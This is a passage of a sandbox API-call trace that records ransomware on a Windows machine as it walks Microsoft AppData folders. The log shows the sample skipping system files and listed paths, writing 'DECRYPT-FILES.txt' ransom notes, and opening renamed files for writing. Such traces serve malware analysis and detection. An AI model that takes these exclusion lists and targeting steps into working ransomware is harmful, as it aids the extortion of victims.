dwReserved1=0x0, cFileName="Outlook.srs.Kws2mc", cAlternateFileName="OUTLOO~1.KWS")) returned 1 [0180.686] lstrcmpiW (lpString1="Outlook.srs.Kws2mc", lpString2="DECRYPT-FILES.txt") returned 1 [0180.686] lstrcmpiW (lpString1="Outlook.srs.Kws2mc", lpString2="autorun.inf") returned 1 [0180.686] lstrcmpiW (lpString1="Outlook.srs.Kws2mc", lpString2="boot.ini") returned 1 [0180.686] lstrcmpiW (lpString1="Outlook.srs.Kws2mc", lpString2="desktop.ini") returned 1 [0180.686] lstrcmpiW (lpString1="Outlook.srs.Kws2mc", lpString2="ntuser.dat") returned 1 [0180.686] lstrcmpiW (lpString1="Outlook.srs.Kws2mc", lpString2="iconcache.db") returned 1 [0180.686] lstrcmpiW (lpString1="Outlook.srs.Kws2mc", lpString2="bootsect.bak") returned 1 [0180.686] lstrcmpiW (lpString1="Outlook.srs.Kws2mc", lpString2="ntuser.dat.log") returned 1 [0180.686] lstrcmpiW (lpString1="Outlook.srs.Kws2mc", lpString2="thumbs.db") returned -1 [0180.686] lstrcmpiW (lpString1="Outlook.srs.Kws2mc", lpString2="Bootfont.bin") returned 1 [0180.686] lstrlenW (lpString="Outlook.srs.Kws2mc") returned 18 [0180.687] lstrcmpiW (lpString1="Kws2mc", lpString2="lnk") returned -1 [0180.687] lstrcmpiW (lpString1="Kws2mc", lpString2="exe") returned 1 [0180.687] lstrcmpiW (lpString1="Kws2mc", lpString2="sys") returned -1 [0180.687] lstrcmpiW (lpString1="Kws2mc", lpString2="dll") returned 1 [0180.687] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\") returned 64 [0180.687] lstrlenW (lpString="Outlook.srs.Kws2mc") returned 18 [0180.687] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\" [0180.687] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\", lpString2="Outlook.srs.Kws2mc" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs.Kws2mc") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs.Kws2mc" [0180.687] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.687] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.srs.Kws2mc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\outlook.srs.kws2mc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x274 [0180.687] GetFileSizeEx (in: hFile=0x274, lpFileSize=0x36fdd30 | out: lpFileSize=0x36fdd30*=2824) returned 1 [0180.687] CreateFileMappingW (hFile=0x274, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x278 [0180.687] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0180.688] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0180.688] CloseHandle (hObject=0x278) returned 1 [0180.688] CloseHandle (hObject=0x274) returned 1 [0180.688] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.689] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6215c440, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x6215c440, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0xaacad480, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xaaa, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook.xml.nT3uZr", cAlternateFileName="OUTLOO~1.NT3")) returned 1 [0180.689] lstrcmpiW (lpString1="Outlook.xml.nT3uZr", lpString2="DECRYPT-FILES.txt") returned 1 [0180.689] lstrcmpiW (lpString1="Outlook.xml.nT3uZr", lpString2="autorun.inf") returned 1 [0180.689] lstrcmpiW (lpString1="Outlook.xml.nT3uZr", lpString2="boot.ini") returned 1 [0180.689] lstrcmpiW (lpString1="Outlook.xml.nT3uZr", lpString2="desktop.ini") returned 1 [0180.689] lstrcmpiW (lpString1="Outlook.xml.nT3uZr", lpString2="ntuser.dat") returned 1 [0180.689] lstrcmpiW (lpString1="Outlook.xml.nT3uZr", lpString2="iconcache.db") returned 1 [0180.689] lstrcmpiW (lpString1="Outlook.xml.nT3uZr", lpString2="bootsect.bak") returned 1 [0180.689] lstrcmpiW (lpString1="Outlook.xml.nT3uZr", lpString2="ntuser.dat.log") returned 1 [0180.689] lstrcmpiW (lpString1="Outlook.xml.nT3uZr", lpString2="thumbs.db") returned -1 [0180.689] lstrcmpiW (lpString1="Outlook.xml.nT3uZr", lpString2="Bootfont.bin") returned 1 [0180.689] lstrlenW (lpString="Outlook.xml.nT3uZr") returned 18 [0180.689] lstrcmpiW (lpString1="nT3uZr", lpString2="lnk") returned 1 [0180.689] lstrcmpiW (lpString1="nT3uZr", lpString2="exe") returned 1 [0180.689] lstrcmpiW (lpString1="nT3uZr", lpString2="sys") returned -1 [0180.689] lstrcmpiW (lpString1="nT3uZr", lpString2="dll") returned 1 [0180.689] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\") returned 64 [0180.689] lstrlenW (lpString="Outlook.xml.nT3uZr") returned 18 [0180.689] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\" [0180.689] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\", lpString2="Outlook.xml.nT3uZr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml.nT3uZr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml.nT3uZr" [0180.689] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.689] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml.nT3uZr" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\outlook\\outlook.xml.nt3uzr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x274 [0180.690] GetFileSizeEx (in: hFile=0x274, lpFileSize=0x36fdd30 | out: lpFileSize=0x36fdd30*=2730) returned 1 [0180.690] CreateFileMappingW (hFile=0x274, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x278 [0180.690] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0180.691] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0180.691] CloseHandle (hObject=0x278) returned 1 [0180.691] CloseHandle (hObject=0x274) returned 1 [0180.691] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.691] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6215c440, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x6215c440, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0xaacad480, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0xaaa, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook.xml.nT3uZr", cAlternateFileName="OUTLOO~1.NT3")) returned 0 [0180.691] FindClose (in: hFindFile=0x479938 | out: hFindFile=0x479938) returned 1 [0180.691] CloseHandle (hObject=0x26c) returned 1 [0180.691] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x33c0ebb0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaacd35e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaacd35e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PowerPoint", cAlternateFileName="POWERP~1")) returned 1 [0180.691] lstrcmpW (lpString1="PowerPoint", lpString2=".") returned 1 [0180.691] lstrcmpW (lpString1="PowerPoint", lpString2="..") returned 1 [0180.691] lstrcatW (in: lpString1="PowerPoint", lpString2="\\" | out: lpString1="PowerPoint\\") returned="PowerPoint\\" [0180.691] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="PowerPoint\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\" [0180.691] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\", lpSrch="\\Program Files") returned 0x0 [0180.691] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\", lpSrch=":\\Windows") returned 0x0 [0180.691] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\", lpSrch="\\Games\\") returned 0x0 [0180.691] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.691] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.691] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.691] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.692] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.692] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\", lpSrch="\\All Users") returned 0x0 [0180.692] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.692] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.692] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.692] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\", lpSrch="AhnLab") returned 0x0 [0180.692] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.692] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\") returned 67 [0180.692] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.692] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\\\0a16c9.tmp") returned 78 [0180.692] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\powerpoint\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x26c [0180.693] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\") returned 67 [0180.693] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.693] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\\\DECRYPT-FILES.txt") returned 85 [0180.693] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\powerpoint\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.693] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\") returned 67 [0180.693] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\*" [0180.693] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\*", lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x33c0ebb0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xeed3c2e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeed3c2e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479938 [0180.693] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.693] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x33c0ebb0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xeed3c2e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeed3c2e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.693] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.693] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.693] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeed3c2e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeed3c2e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeed3c2e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.693] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.693] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.693] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.693] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.693] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.693] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.694] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.694] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.694] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.694] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.694] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.694] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.694] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.694] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.694] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.694] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\") returned 67 [0180.694] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.694] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\" [0180.694] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\0a16c9.tmp" [0180.694] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.694] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\PowerPoint\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\powerpoint\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.694] CloseHandle (hObject=0x0) returned 0 [0180.694] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.694] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaacd35e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaacd35e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaacd35e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.694] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.694] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaacd35e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaacd35e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaacd35e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0180.695] FindClose (in: hFindFile=0x479938 | out: hFindFile=0x479938) returned 1 [0180.695] CloseHandle (hObject=0x26c) returned 1 [0180.695] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x510b16f0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaacf9740, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaacf9740, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof", cAlternateFileName="")) returned 1 [0180.695] lstrcmpW (lpString1="Proof", lpString2=".") returned 1 [0180.695] lstrcmpW (lpString1="Proof", lpString2="..") returned 1 [0180.695] lstrcatW (in: lpString1="Proof", lpString2="\\" | out: lpString1="Proof\\") returned="Proof\\" [0180.695] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="Proof\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\" [0180.695] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\", lpSrch="\\Program Files") returned 0x0 [0180.695] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\", lpSrch=":\\Windows") returned 0x0 [0180.695] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\", lpSrch="\\Games\\") returned 0x0 [0180.695] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.695] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.695] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.695] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.695] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.695] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\", lpSrch="\\All Users") returned 0x0 [0180.695] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.695] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.695] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.695] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\", lpSrch="AhnLab") returned 0x0 [0180.695] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.695] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\") returned 62 [0180.695] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.695] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\\\0a16c9.tmp") returned 73 [0180.695] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\proof\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x26c [0180.696] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\") returned 62 [0180.696] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.696] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\\\DECRYPT-FILES.txt") returned 80 [0180.696] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\proof\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.697] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\") returned 62 [0180.697] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\*" [0180.697] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Proof\\*", lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x510b16f0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xeed3c2e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeed3c2e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, 